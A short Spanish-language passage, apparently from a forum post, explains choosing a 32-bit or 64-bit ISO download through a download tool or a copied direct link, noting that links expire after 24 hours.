Finalmente, elija si desea descargar la versión de 32 bits o de 64 bits del producto. Al hacer clic en cualquiera de los botones de descarga se iniciará la descarga utilizando la herramienta de descarga ISO, por lo que deberá mantenerla abierta hasta que finalice la descarga. Alternativamente, puede usar los botones "Copiar enlace" a la derecha para copiar el enlace de descarga directa a su portapapeles y luego descargar el archivo usando su navegador. De cualquier manera, tenga en cuenta que la mayoría de los enlaces generados por la herramienta solo son válidos durante 24 horas, aunque siempre puede volver y generar nuevos enlaces.


Referencia: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta